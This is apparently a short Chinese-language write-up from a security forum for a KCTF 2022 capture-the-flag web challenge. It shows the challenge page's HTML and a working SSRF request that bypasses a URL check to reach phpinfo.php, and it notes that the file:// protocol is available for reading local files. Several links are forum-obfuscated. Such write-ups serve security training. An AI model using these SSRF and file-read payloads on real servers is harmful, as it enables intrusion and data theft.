[原创]KCTF2022春第四题飞蛾扑火 writeup-CTF对抗-看雪-安全社区|安全招聘|kanxue.com

[原创]KCTF2022春第四题飞蛾扑火 writeup

发表于: 2022-5-15 17:08 3370

[原创]KCTF2022春第四题飞蛾扑火 writeup

Wblank

2022-5-15 17:08

3370

访问 f88K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5H3x3g2)9J5k6e0R3&6i4K6u0W2x3e0b7H3i4K6u0W2x3U0l9%4i4K6y4m8z5o6l9@1y4q4)9J5c8R3`.`.

<html>
<head>
<meta charset="utf-8">
<title>欢迎挑战 Design by 香草</title>
</head>
<body>
<!--phpinfo.php-->
<img src="url.php?url=706K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6U0N6r3k6Q4x3X3g2H3k6h3c8A6P5g2)9J5k6h3y4G2L8g2)9J5c8Y4g2H3L8r3!0S2k6q4)9J5c8Y4c8W2j5h3#2Q4x3V1j5%4y4U0u0Q4x3V1k6@1k6h3q4E0x3U0x3$3y4K6j5J5i4K6u0W2M7r3&6Y4">
</body>
</html>

先把url.php重定向过了,做到ssrf

1	`http://101.89.140.207:8044/url.php?url=127.0.0.1://ctf.pediy.com/../phpinfo.php`

图片描述
看到curl下支持的协议存在file

262K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5H3x3g2)9J5k6e0R3&6i4K6u0W2x3e0b7H3i4K6u0W2x3U0l9%4i4K6y4m8z5o6l9@1y4q4)9J5c8Y4g2J5L8q4)9J5k6i4m8Z5M7q4)9K6c8Y4g2J5L8q4)9K6c8o6p5J5x3#2)9J5k6e0f1%4i4K6u0W2x3U0f1@1i4K6u0W2y4o6u0Q4x3@1q4Q4x3V1k6Q4x3V1k6D9L8$3y4S2L8r3S2G2M7%4c8Q4x3V1k6Q4x3X3g2Q4x3X3g2Q4x3V1k6X3L8r3q4Y4i4K6u0W2M7r3S2H3
图片描述